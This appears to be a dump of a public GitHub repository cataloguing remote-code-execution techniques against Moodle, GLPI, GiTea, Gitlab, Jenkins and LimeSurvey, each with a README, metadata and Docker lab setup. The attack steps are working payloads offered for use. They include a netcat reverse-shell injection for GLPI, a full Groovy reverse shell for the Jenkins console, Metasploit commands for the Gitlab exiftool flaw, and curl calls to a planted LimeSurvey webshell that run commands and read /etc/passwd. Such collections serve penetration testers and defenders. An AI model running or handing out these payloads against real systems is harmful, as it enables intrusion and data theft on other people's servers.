-------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Learning-Management-Systems-(LMS)/Moodle/techniques/Upload-a-plugin/imgs/exec_code_web.png -------------------------------------------------------------------------------- /Learning-Management-Systems-(LMS)/Moodle/techniques/Upload-a-plugin/imgs/install_plugin_from_zip_file.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Learning-Management-Systems-(LMS)/Moodle/techniques/Upload-a-plugin/imgs/install_plugin_from_zip_file.png -------------------------------------------------------------------------------- /Learning-Management-Systems-(LMS)/Moodle/techniques/Upload-a-plugin/imgs/plugin_successfully_uploaded.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Learning-Management-Systems-(LMS)/Moodle/techniques/Upload-a-plugin/imgs/plugin_successfully_uploaded.png -------------------------------------------------------------------------------- /Learning-Management-Systems-(LMS)/Moodle/techniques/Upload-a-plugin/imgs/site_dashboard.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Learning-Management-Systems-(LMS)/Moodle/techniques/Upload-a-plugin/imgs/site_dashboard.png -------------------------------------------------------------------------------- /Learning-Management-Systems-(LMS)/Moodle/techniques/Upload-a-plugin/imgs/upload_and_install.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Learning-Management-Systems-(LMS)/Moodle/techniques/Upload-a-plugin/imgs/upload_and_install.png -------------------------------------------------------------------------------- /Learning-Management-Systems-(LMS)/Moodle/techniques/Upload-a-plugin/imgs/upload_and_install_choose_file.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Learning-Management-Systems-(LMS)/Moodle/techniques/Upload-a-plugin/imgs/upload_and_install_choose_file.png -------------------------------------------------------------------------------- /Learning-Management-Systems-(LMS)/Moodle/techniques/Upload-a-plugin/technique.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "Moodle - Upload a plugin", 3 | "work_in_progress": false, 4 | "references": [ 5 | "https://github.com/joaomatosf/jexboss" 6 | ] 7 | } -------------------------------------------------------------------------------- /Learning-Management-Systems-(LMS)/README.md: -------------------------------------------------------------------------------- 1 | # Learning-Management-Systems-(LMS) 2 | 3 | ## Softwares 4 | 5 | - [**Moodle**: (1 technique)](./Moodle/) 6 | -------------------------------------------------------------------------------- /Other/GLPI/README.md: -------------------------------------------------------------------------------- 1 | # GLPI 2 | 3 | Gestionnaire Libre de Parc Informatique (GLPI) is a Free Asset and IT Management Software package, that provides ITIL Service Desk features, licenses tracking and software auditing. 4 | 5 | - Official site: https://glpi-project.org/ 6 | - Source code: https://github.com/glpi-project/glpi/ 7 | 8 | ## Techniques to achieve RCE with GLPI 9 | 10 | ### Latest version and all versions above GLPI 0.90 11 | 12 | - [Install shellcommand Plugin - GLPI Remote Code Execution (RCE) (Authenticated)](techniques/GLPI_shellcommand_plugin_authenticated_rce/README.md) 13 | 14 | 15 | -------------------------------------------------------------------------------- /Other/GLPI/techniques/GLPI_shellcommand_plugin_authenticated_rce/README.md: -------------------------------------------------------------------------------- 1 | # GLPI-RCE-Authenticated 2 | How to RCE as a glpi administrator 3 | 4 | `` 5 | Gestionnaire Libre de Parc Informatique (GLPI) is a Free Asset and IT Management Software package, that provides ITIL Service Desk features, licenses tracking and software auditing. 6 | `` 7 | 8 | https://github.com/glpi-project/glpi 9 | 10 | ## Requirements 11 | 12 | You need to be super administrator of glpi to add the plugin and perform the rce.
The default login is **glpi / glpi** 13 | 14 | ## Exploitation 15 | 16 | The technique consists in using a plugin which allows to execute commands on the system like ping or tracert and to divert it towards the reverse shell for example. 17 | 18 | 19 | Initially you must add a key "GLPI network" in the general parameters of glpi what gives the rights to add extensions, you have just to create an account for free on the site of glpi and to copy paste the key.
20 | https://services.glpi-network.com/register 21 | 22 | ![](https://i.imgur.com/CuNnAFw.png) 23 | 24 | ![](https://i.imgur.com/o4HQRnH.png) 25 | 26 | in the Marketplace : ``/glpi/front/marketplace.php``
27 | Add the plugin named "Launch Shell Commands" 28 | 29 | ![](https://i.imgur.com/HO9rTMo.png) 30 | 31 | Edit the ping command page : ``/glpi/marketplace/shellcommands/front/shellcommand.form.php?id=1`` 32 | 33 | Enter a random string in the tag and in the parameters you can run anything as a command using a semicolon
34 | You can use this payload for reverse shell : 35 | ```sh 36 | ;nc -c /bin/bash localhost 1234 37 | ``` 38 | 39 | It is simply an "exec" of all the arguments there are no filters
40 | We control the variable $commandToExec 41 | 42 | ![image](https://user-images.githubusercontent.com/69597623/189349689-45af6cd0-9611-4a85-b561-4219da114738.png) 43 | 44 | ![](https://i.imgur.com/0vuQnGF.png) 45 | 46 | Add a ping command group : ``/glpi/marketplace/shellcommands/front/commandgroup.php`` 47 | 48 | ![](https://i.imgur.com/CKQkOS2.png) 49 | 50 | To finish to execute the payload: ``/glpi/marketplace/shellcommands/front/advanced_execution.php``
51 | Select the ping command group, a category and a device from the list (if you don't have one you can create one in Assets) 52 | 53 | ![](https://i.imgur.com/3ZnE7eJ.png) 54 | ![](https://i.imgur.com/zlns3aD.png) 55 | 56 | -------------------------------------------------------------------------------- /Other/GiTea/README.md: -------------------------------------------------------------------------------- 1 | # GiTea 2 | 3 | GiTea is an open-source forge software package for hosting software development version control using Git as well as other collaborative features like bug tracking, wikis and code review. It supports self-hosting but also provides a free public first-party instance. 4 | 5 | Gitea is a community managed lightweight code hosting solution written in Go. It is published under the MIT license. 6 | 7 | - **Official Site:** https://gitea.io/en-us/ 8 | - **Source Code:** https://github.com/go-gitea/ 9 | 10 | ## Techniques to achieve RCE with GiTea 11 | 12 | ### With user credentials 13 | 14 | - [User with git hooks activated](./techniques/User-with-git-hooks-activated/README.md) 15 | -------------------------------------------------------------------------------- /Other/GiTea/techniques/User-with-git-hooks-activated/README.md: -------------------------------------------------------------------------------- 1 | # GiTea - User with git hooks activated 2 | 3 | ## Requirements 4 | 5 | A valid username and password of an account with "May create git hooks" right. 6 | 7 | ![](./imgs/may_create_git_hooks.png) 8 | 9 | ## Description 10 | 11 | The git hook feature in Gitea 1.1.0 through 1.12.5 might allow for authenticated remote code execution in customer environments where the documentation was not understood (e.g., one viewpoint is that the dangerousness of this feature should be documented immediately above the `ENABLE_GIT_HOOKS` line in the config file). This vulnerability was found by [Niklas Goerke](https://twitter.com/Niklas974) in April 2020. 12 | 13 | **NOTE**: The vendor has indicated this is not a vulnerability and states "_This is a functionality of the software that is limited to a very limited subset of accounts. If you give someone the privilege to execute arbitrary code on your server, they can execute arbitrary code on your server. We provide very clear warnings to users around this functionality and what it provides._" 14 | 15 | In order to exploit this vulnerability/feature, we need to have a GiTea account with the "_May create git hooks_" rights activated. 16 | 17 | A [github issue](https://github.com/go-gitea/gitea/pull/13058) was opened and fixed in version 1.13.0 18 | 19 | ## Exploitation 20 | 21 | In order to successfully exploit this vulnerability/feature, the target server GiTea version should be between version 1.1.0 and version 1.13, and you need a valid account (username, password) with "_May create git hooks_" rights activated. 22 | 23 | ![Account with "_May create git hooks_" rights activated](./imgs/may_create_git_hooks.png) 24 | 25 | From a system administration point of view, the gitea process looks like this before the exploitation : 26 | 27 | ![Service status before exploit](./imgs/gitea_service_before_exploit.png) 28 | 29 | First of all, we need to create a repository on the GiTea web interface, using our account. We create the repository and we go into `Settings -> Git Hooks -> Post Receive Hook`. In this hook you can write a shell script that will be executed after receiving a new commit. 30 | 31 | ![Post Receive Hook](./imgs/post_receive_hook.png) 32 | 33 | Now we will create a temporary directory on our attacking machine, and push to the remote repository. It will trigger the `Post Receive Hook` script. 34 | 35 | ```sh 36 | touch README.md 37 | git init 38 | git add README.md 39 | git commit -m "Initial commit" 40 | git remote add origin https://vulnserver/testuser/vuln.git 41 | git push -u origin master 42 | ``` 43 | 44 | After we pushed the commit to the remote repository, it will trigger the `Post Receive Hook` script and we will have a reverse shell! 45 | 46 | ![Reverse Shell](./imgs/gitea_reverse_shell.png) 47 | 48 | After the exploitation, a system administrator can easily see our detached reverse shell in the child processes of GiTea: 49 | 50 | ![Service status after exploit](./imgs/gitea_service_after_exploit.png) 51 | 52 | ## Exploit tool 53 | 54 | I wrote a tool to automatically exploit this vulnerability [CVE-2020-14144-GiTea-git-hooks-rce](https://github.com/p0dalirius/CVE-2020-14144-GiTea-git-hooks-rce) : 55 | 56 | ``` 57 | $ ./CVE-2020-14144-GiTea-git-hooks-rce.py -h 58 | _____ _ _______ 59 | / ____(_)__ __| CVE-2020-14144 60 | | | __ _ | | ___ __ _ 61 | | | |_ | | | |/ _ \/ _` | Authenticated Remote Code Execution 62 | | |__| | | | | __/ (_| | 63 | \_____|_| |_|\___|\__,_| GiTea versions >= 1.1.0 to <= 1.12.5 64 | 65 | usage: CVE-2020-14144-GiTea-git-hooks-rce.py [-h] [-v] -t TARGET -u USERNAME -p PASSWORD [-I REV_IP] [-P REV_PORT] 66 | [-f PAYLOAD_FILE] 67 | 68 | CVE-2020-14144 - GiTea authenticated Remote Code Execution using git hooks. 69 | 70 | optional arguments: 71 | -h, --help show this help message and exit 72 | -v, --verbose Increase verbosity. 73 | -t TARGET, --target TARGET 74 | Target host (http://..., https://... or domain name) 75 | -u USERNAME, --username USERNAME 76 | GiTea username 77 | -p PASSWORD, --password PASSWORD 78 | GiTea password 79 | -I REV_IP, --rev-ip REV_IP 80 | Reverse shell listener IP 81 | -P REV_PORT, --rev-port REV_PORT 82 | Reverse shell listener port 83 | -f PAYLOAD_FILE, --payload-file PAYLOAD_FILE 84 | Path to shell script payload to use. 85 | ``` 86 | 87 | ## References 88 | - https://github.com/p0dalirius/CVE-2020-14144-GiTea-git-hooks-rce 89 | - https://github.com/go-gitea/gitea/pull/13058 -------------------------------------------------------------------------------- /Other/GiTea/techniques/User-with-git-hooks-activated/imgs/gitea_reverse_shell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/GiTea/techniques/User-with-git-hooks-activated/imgs/gitea_reverse_shell.png -------------------------------------------------------------------------------- /Other/GiTea/techniques/User-with-git-hooks-activated/imgs/gitea_service_after_exploit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/GiTea/techniques/User-with-git-hooks-activated/imgs/gitea_service_after_exploit.png -------------------------------------------------------------------------------- /Other/GiTea/techniques/User-with-git-hooks-activated/imgs/gitea_service_before_exploit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/GiTea/techniques/User-with-git-hooks-activated/imgs/gitea_service_before_exploit.png -------------------------------------------------------------------------------- /Other/GiTea/techniques/User-with-git-hooks-activated/imgs/may_create_git_hooks.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/GiTea/techniques/User-with-git-hooks-activated/imgs/may_create_git_hooks.png -------------------------------------------------------------------------------- /Other/GiTea/techniques/User-with-git-hooks-activated/imgs/post_receive_hook.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/GiTea/techniques/User-with-git-hooks-activated/imgs/post_receive_hook.png -------------------------------------------------------------------------------- /Other/GiTea/techniques/User-with-git-hooks-activated/technique.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "GiTea - User with git hooks activated", 3 | "work_in_progress": false, 4 | "references": [ 5 | "https://github.com/p0dalirius/CVE-2020-14144-GiTea-git-hooks-rce", 6 | "https://github.com/go-gitea/gitea/pull/13058" 7 | ] 8 | } -------------------------------------------------------------------------------- /Other/GiTea/techniques/User-with-git-hooks-activated/test_env/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM tomcat:9.0.62-jdk11-openjdk-slim-buster 2 | 3 | # https://octopus.com/blog/deployable-tomcat-docker-containers 4 | 5 | RUN mv /usr/local/tomcat/webapps /usr/local/tomcat/webapps2 ;\ 6 | mv /usr/local/tomcat/webapps.dist /usr/local/tomcat/webapps 7 | 8 | COPY ./files/context.xml /usr/local/tomcat/webapps/manager/META-INF/context.xml 9 | COPY ./files/tomcat-users.xml /usr/local/tomcat/conf/tomcat-users.xml 10 | 11 | CMD ["catalina.sh", "run"] 12 | -------------------------------------------------------------------------------- /Other/GiTea/techniques/User-with-git-hooks-activated/test_env/Makefile: -------------------------------------------------------------------------------- 1 | .PHONY: build img 2 | 3 | IMGNAME := awesome_rce_gitea_git_hooks 4 | PORT := 10080 5 | 6 | all : build 7 | 8 | build: 9 | docker build -t $(IMGNAME):latest -f Dockerfile . 10 | 11 | start: 12 | docker run --rm -it -p $(PORT):8080 $(IMGNAME) 13 | 14 | background: 15 | docker run --rm -d -p $(PORT):8080 $(IMGNAME) 16 | 17 | shell: 18 | docker exec -it $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') bash 19 | 20 | stop: 21 | docker stop $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') -------------------------------------------------------------------------------- /Other/Gitlab/README.md: -------------------------------------------------------------------------------- 1 | # Gitlab 2 | 3 | ## Introduction 4 | 5 | Gitlab is an open source end-to-end software development platform with built-in version control, issue tracking, code review, CI/CD, and more. 6 | 7 | ## Techniques to achieve RCE with Gitlab 8 | 9 | ### Unauthenticated 10 | 11 | - [CVE-2021-22205 - Unauthenticated RCE with exiftool](techniques/CVE-2021-22205%20-%20Unauthenticated%20RCE%20using%20ExifTool/README.md) 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /Other/Gitlab/techniques/CVE-2021-22205 - Unauthenticated RCE using ExifTool/README.md: -------------------------------------------------------------------------------- 1 | # Gitlab - CVE-2021-22205 Unauthenticated RCE with exiftool 2 | 3 | An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution. 4 | 5 | ## Requirements 6 | 7 | This vulnerability affect the below **Gitlab CE/EE** versions: 8 | 9 | - `>=11.9`, `<13.8.8` 10 | - `>=13.9`, `<13.9.6` 11 | - `>=13.10`, `<13.10.3` 12 | 13 | ## Exploitation 14 | 15 | ### Step 1: Detection 16 | 17 | **Try to find the version of Gitlab** 18 | First of all, before trying to exploit the RCE, we need to try to find the version of Gitlab. 19 | 20 | - **Authenticated**: The version can often be found on `/help` endpoint when authenticated with a user account. 21 | 22 | ![](imgs/gitlab_version.png) 23 | 24 | 25 | - **Unauthenticated**: On recent versions the `What’s new` feature on `/help` endpoint show an approximative version without authentication. Found this menu clinking on `?` button on top right. 26 | 27 | ![](imgs/gitlab_approximative_version.png) 28 | 29 | **Nuclei detection** 30 | Some nuclei templates are available for detection with id `CVE-2021-22205`, `gitlab-rce` or tag `gitlab`: 31 | - [gitlab-rce template](https://github.com/projectdiscovery/nuclei-templates/blob/d6636f9169920d3ccefc692bc1a6136e2deb9205/vulnerabilities/gitlab/gitlab-rce.yaml) 32 | - [CVE-2021-22205 template](https://github.com/projectdiscovery/nuclei-templates/blob/637eec3efac6eb384742c7aaa4e7d14f3392ede9/cves/2021/CVE-2021-22205.yaml) 33 | 34 | `nuclei -u http://192.168.1.10 -id CVE-2021-22205,gitlab-rce` 35 | 36 | ![](imgs/nuclei_id.png) 37 | 38 | `nuclei -u http://192.168.1.10 -tags gitlab -silent` 39 | 40 | ![](imgs/nuclei_tags.png) 41 | 42 | ### Step 2.1: Exploit using metasploit 43 | 44 | This RCE technique is available in the `multi/http/gitlab_exif_rce` module in metasploit. 45 | 46 | ```bash 47 | use multi/http/gitlab_exif_rce 48 | set RHOSTS 192.168.1.10 49 | set LHOST wlan0 50 | run 51 | ``` 52 | **Enjoy your shell** 53 | 54 | After running the metasploit module, if the remote gitlab is vulnerable you will have an meterpreter session. 55 | 56 | ![](imgs/metasploit_gitlab_rce.png) 57 | 58 | ### Step 2.2: Exploit without Metasploit 59 | 60 | Inspiringz made an [python exploit](https://github.com/inspiringz/CVE-2021-22205). 61 | 62 | **Start your listener** 63 | 64 | `nc -lvnp 1337` 65 | 66 | **Enjoy your shell** 67 | 68 | ![](imgs/rev_shell_python.png) 69 | 70 | 71 | ## References 72 | 73 | - [Action needed by self-managed customers in response to CVE-2021-22205](https://about.gitlab.com/blog/2021/11/04/action-needed-in-response-to-cve2021-22205/) 74 | - [Hackerone report #1154542](https://hackerone.com/reports/1154542) 75 | - [Gitlab issue #327121](https://gitlab.com/gitlab-org/gitlab/-/issues/327121) -------------------------------------------------------------------------------- /Other/Gitlab/techniques/CVE-2021-22205 - Unauthenticated RCE using ExifTool/imgs/gitlab_approximative_version.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/Gitlab/techniques/CVE-2021-22205 - Unauthenticated RCE using ExifTool/imgs/gitlab_approximative_version.png -------------------------------------------------------------------------------- /Other/Gitlab/techniques/CVE-2021-22205 - Unauthenticated RCE using ExifTool/imgs/gitlab_version.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/Gitlab/techniques/CVE-2021-22205 - Unauthenticated RCE using ExifTool/imgs/gitlab_version.png -------------------------------------------------------------------------------- /Other/Gitlab/techniques/CVE-2021-22205 - Unauthenticated RCE using ExifTool/imgs/metasploit_gitlab_rce.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/Gitlab/techniques/CVE-2021-22205 - Unauthenticated RCE using ExifTool/imgs/metasploit_gitlab_rce.png -------------------------------------------------------------------------------- /Other/Gitlab/techniques/CVE-2021-22205 - Unauthenticated RCE using ExifTool/imgs/nuclei_id.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/Gitlab/techniques/CVE-2021-22205 - Unauthenticated RCE using ExifTool/imgs/nuclei_id.png -------------------------------------------------------------------------------- /Other/Gitlab/techniques/CVE-2021-22205 - Unauthenticated RCE using ExifTool/imgs/nuclei_tags.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/Gitlab/techniques/CVE-2021-22205 - Unauthenticated RCE using ExifTool/imgs/nuclei_tags.png -------------------------------------------------------------------------------- /Other/Gitlab/techniques/CVE-2021-22205 - Unauthenticated RCE using ExifTool/imgs/rev_shell_python.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/Gitlab/techniques/CVE-2021-22205 - Unauthenticated RCE using ExifTool/imgs/rev_shell_python.png -------------------------------------------------------------------------------- /Other/Gitlab/techniques/CVE-2021-22205 - Unauthenticated RCE using ExifTool/technique.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "Gitlab - CVE-2021-22205 Unauthenticated RCE with exiftool", 3 | "work_in_progress": false, 4 | "references": [ 5 | "https://about.gitlab.com/blog/2021/11/04/action-needed-in-response-to-cve2021-22205/)", 6 | "https://hackerone.com/reports/1154542)", 7 | "https://gitlab.com/gitlab-org/gitlab/-/issues/327121)" 8 | ] 9 | } -------------------------------------------------------------------------------- /Other/Gitlab/techniques/CVE-2021-22205 - Unauthenticated RCE using ExifTool/test_env/Dockerfile: -------------------------------------------------------------------------------- 1 | from gitlab/gitlab-ee:13.10.0-ee.0 2 | -------------------------------------------------------------------------------- /Other/Gitlab/techniques/CVE-2021-22205 - Unauthenticated RCE using ExifTool/test_env/Makefile: -------------------------------------------------------------------------------- 1 | .PHONY: build img 2 | 3 | IMGNAME := awesome_rce_gitlab_exiftool 4 | 5 | all : build 6 | 7 | build: 8 | docker build -t $(IMGNAME):latest -f Dockerfile . 9 | 10 | start: 11 | docker run --rm -it -p 80:80 -p 443:443 $(IMGNAME) 12 | 13 | background: 14 | docker run --rm -d -p 80:80 -p 443:443 $(IMGNAME) 15 | 16 | shell: 17 | docker exec -it $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') bash 18 | 19 | stop: 20 | docker stop $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') -------------------------------------------------------------------------------- /Other/Jenkins/README.md: -------------------------------------------------------------------------------- 1 | # Jenkins 2 | 3 | ## Introduction 4 | 5 | Jenkins is an open source automation server. It helps automate the parts of software development related to building, testing, and deploying, facilitating continuous integration and continuous delivery. It is a server-based system that runs in servlet containers such as Apache Tomcat. 6 | 7 | ## Techniques to achieve RCE with Jenkins 8 | 9 | ### With admin credentials 10 | 11 | - [Execute a script in the console](techniques/Execute-a-script-in-the-console/README.md) 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /Other/Jenkins/techniques/Execute-a-script-in-the-console/README.md: -------------------------------------------------------------------------------- 1 | # Jenkins - Execute a script in the console 2 | 3 | ## Requirements 4 | 5 | - A valid **username and password** of a user with **admin rights** on the Jenkins. 6 | 7 | ## Exploitation 8 | 9 | ### Step 1: Access the Jenkins 10 | 11 | First of all, you need to access the Jenkins with a user having **admin rights** on the Jenkins: 12 | 13 | ![](./imgs/welcome.png) 14 | 15 | ### Step 2: Access the script console 16 | 17 | Then go in the Jenkins script console page: 18 | 19 | ![](./imgs/script_console.png) 20 | 21 | ### Step 3: Start a reverse shell 22 | 23 | You can execute Groovy script in the Jenkins script console, so you can start a reverse shell! You can use the following payload (from here: [https://podalirius.net/en/articles/unix-reverse-shells-cheatsheet/#groovy](https://podalirius.net/en/articles/unix-reverse-shells-cheatsheet/#groovy)): 24 | 25 | ```java 26 | String host="192.168.1.27"; 27 | int port=4444; 28 | String cmd="/bin/sh"; 29 | Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); 30 | ``` 31 | 32 | ![](./imgs/reverse_shell.png) 33 | 34 | ### Step 3: Enjoy your shell 35 | 36 | Now, prepare your listener with netcat (`nc -lvp `) and enjoy your shell: 37 | 38 | ![](./imgs/shell.png) 39 | 40 | ### Demonstration 41 | 42 | Here is a video walkthrough of this technique: 43 | 44 | https://user-images.githubusercontent.com/79218792/168493712-3eb87dbc-68ae-4e9b-ba57-160f9fba37f1.mp4 45 | 46 | ## References 47 | - https://github.com/p0dalirius/LimeSurvey-plugin-webshell 48 | -------------------------------------------------------------------------------- /Other/Jenkins/techniques/Execute-a-script-in-the-console/imgs/demo.mp4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/Jenkins/techniques/Execute-a-script-in-the-console/imgs/demo.mp4 -------------------------------------------------------------------------------- /Other/Jenkins/techniques/Execute-a-script-in-the-console/imgs/manage.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/Jenkins/techniques/Execute-a-script-in-the-console/imgs/manage.png -------------------------------------------------------------------------------- /Other/Jenkins/techniques/Execute-a-script-in-the-console/imgs/reverse_shell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/Jenkins/techniques/Execute-a-script-in-the-console/imgs/reverse_shell.png -------------------------------------------------------------------------------- /Other/Jenkins/techniques/Execute-a-script-in-the-console/imgs/script_console.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/Jenkins/techniques/Execute-a-script-in-the-console/imgs/script_console.png -------------------------------------------------------------------------------- /Other/Jenkins/techniques/Execute-a-script-in-the-console/imgs/shell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/Jenkins/techniques/Execute-a-script-in-the-console/imgs/shell.png -------------------------------------------------------------------------------- /Other/Jenkins/techniques/Execute-a-script-in-the-console/imgs/welcome.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/Jenkins/techniques/Execute-a-script-in-the-console/imgs/welcome.png -------------------------------------------------------------------------------- /Other/Jenkins/techniques/Execute-a-script-in-the-console/technique.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "Jenkins - Execute a script in the console", 3 | "work_in_progress": false, 4 | "references": [ 5 | "https://github.com/p0dalirius/LimeSurvey-plugin-webshell" 6 | ] 7 | } -------------------------------------------------------------------------------- /Other/Jenkins/techniques/Execute-a-script-in-the-console/test_env/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM jenkins:2.60.3 2 | 3 | -------------------------------------------------------------------------------- /Other/Jenkins/techniques/Execute-a-script-in-the-console/test_env/Makefile: -------------------------------------------------------------------------------- 1 | .PHONY: build img 2 | 3 | IMGNAME := awesome_rce_jenkins_script_console 4 | 5 | all : build 6 | 7 | build: 8 | docker build -t $(IMGNAME):latest -f Dockerfile . 9 | 10 | start: 11 | docker run --rm -it -p 8080:8080 -p 50000:50000 $(IMGNAME) 12 | 13 | background: 14 | docker run --rm -d -p 8080:8080 -p 50000:50000 $(IMGNAME) 15 | 16 | shell: 17 | docker exec -it $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') bash 18 | 19 | stop: 20 | docker stop $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') -------------------------------------------------------------------------------- /Other/LimeSurvey/README.md: -------------------------------------------------------------------------------- 1 | # LimeSurvey 2 | 3 | LimeSurvey is a free and open source on-line statistical survey web app written in PHP based on a MySQL, SQLite, PostgreSQL or MSSQL database, distributed under the GNU General Public License. 4 | 5 | - https://www.limesurvey.org/ 6 | - https://community.limesurvey.org/downloads/ 7 | 8 | ## Techniques to achieve RCE with LimeSurvey 9 | 10 | ### With admin credentials 11 | 12 | - [Upload a plugin](./techniques/Upload-a-plugin/README.md) 13 | 14 | -------------------------------------------------------------------------------- /Other/LimeSurvey/techniques/Upload-a-plugin/README.md: -------------------------------------------------------------------------------- 1 | # LimeSurvey - Upload a plugin 2 | 3 | ## Requirements 4 | 5 | - A valid **username and password** of a user with **admin rights** on the LimeSurvey. 6 | 7 | ## Exploitation 8 | 9 | ### Step 1: Upload the webshell plugin 10 | 11 | Go to "Configuration --> plugins" page, at http://TARGET:10080/index.php/admin/pluginmanager/sa/index, and click on "Upload & install": 12 | 13 | ![](./imgs/upload_and_install.png) 14 | 15 | ### Step 2.1: Executing commands 16 | 17 | You can now execute commands by sending a GET or POST request to http://TARGET/upload/plugins/WebShell/webshell.php with `action=exec&cmd=id`: 18 | 19 | ```sh 20 | $ curl -X POST 'http://TARGET:10080/upload/plugins/WebShell/webshell.php' --data "action=exec&cmd=id" 21 | {"stdout":"uid=33(www-data) gid=33(www-data) groups=33(www-data)\n","exec":"id"} 22 | ``` 23 | 24 | You can also access it by a GET request from a browser: 25 | 26 | ![](./imgs/exec_code_web.png) 27 | 28 | ### Step 2.2: Downloading files 29 | 30 | You can also download remote files by sending a GET or POST request to http://TARGET:10080/upload/plugins/WebShell/webshell.php with `action=download&cmd=/etc/passwd`: 31 | 32 | ```sh 33 | $ curl -X POST 'http://TARGET:10080/upload/plugins/WebShell/webshell.php' --data "action=download&path=/etc/passwd" -o- 34 | root:x:0:0:root:/root:/bin/bash 35 | daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 36 | bin:x:2:2:bin:/bin:/usr/sbin/nologin 37 | sys:x:3:3:sys:/dev:/usr/sbin/nologin 38 | sync:x:4:65534:sync:/bin:/bin/sync 39 | games:x:5:60:games:/usr/games:/usr/sbin/nologin 40 | man:x:6:12:man:/var/cache/man:/usr/sbin/nologin 41 | lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin 42 | mail:x:8:8:mail:/var/mail:/usr/sbin/nologin 43 | news:x:9:9:news:/var/spool/news:/usr/sbin/nologin 44 | uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin 45 | proxy:x:13:13:proxy:/bin:/usr/sbin/nologin 46 | www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin 47 | backup:x:34:34:backup:/var/backups:/usr/sbin/nologin 48 | list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin 49 | 